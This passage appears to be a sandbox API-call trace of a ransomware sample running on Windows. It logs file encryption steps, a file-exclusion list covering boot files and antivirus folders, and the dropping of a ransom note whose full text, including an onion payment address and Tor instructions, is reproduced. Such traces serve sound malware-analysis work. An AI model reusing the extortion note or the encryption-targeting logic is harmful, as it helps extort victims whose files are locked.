"c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\.xxcec6.tmp")) returned 1 [0154.530] CryptDestroyKey (hKey=0x9ad678) returned 1 [0154.530] wcslen (_String="OK") returned 0x2 [0154.530] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.530] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.530] CryptDestroyKey (hKey=0x9ad138) returned 1 [0154.530] CryptDestroyHash (hHash=0x9ad338) returned 1 [0154.530] CryptReleaseContext (hProv=0x8e3b28, dwFlags=0x0) returned 1 [0154.530] FindNextFileW (in: hFindFile=0x9ad7f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0154.530] GetLastError () returned 0x12 [0154.530] FindClose (in: hFindFile=0x9ad7f8 | out: hFindFile=0x9ad7f8) returned 1 [0154.530] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0154.531] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.531] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0154.532] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0154.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.532] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0154.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*.exe") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*.dll") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*.lnk") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*.bat") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*.ini") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*.msi") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*.scf") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*pagefile.sys*") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*NTUSER.DAT*") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*AppData*") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\winrar\\*") returned 0 [0154.532] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\java\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\windows\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\ESET\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\AVG\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\AVIRA\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*Atheros*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*Realtek*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*bootmgr*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*boot*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*boot*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*CONFIG.SYS*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*IO.SYS*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*MSDOS.SYS*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*NTDETECT.COM*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*ntldr*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*chrome*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*opera*") returned 0 [0154.533] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", pszSpec="*firefox*") returned 0 [0154.533] wcslen (_String="\\\\?\\") returned 0x4 [0154.533] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad8b8 [0154.533] wcscmp (_String1=".", _String2=".") returned 0 [0154.533] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.533] wcscmp (_String1="..", _String2=".") returned 1 [0154.533] wcscmp (_String1="..", _String2="..") returned 0 [0154.533] FindNextFileW (in: hFindFile=0x9ad8b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0154.533] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0154.534] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0154.535] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\tipresx.dll.mui", pszSpec="*") returned 1 [0154.535] strlen (_Str="NMoreira") returned 0x8 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.539] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0154.540] CryptGenRandom (in: hProv=0x8bf310, 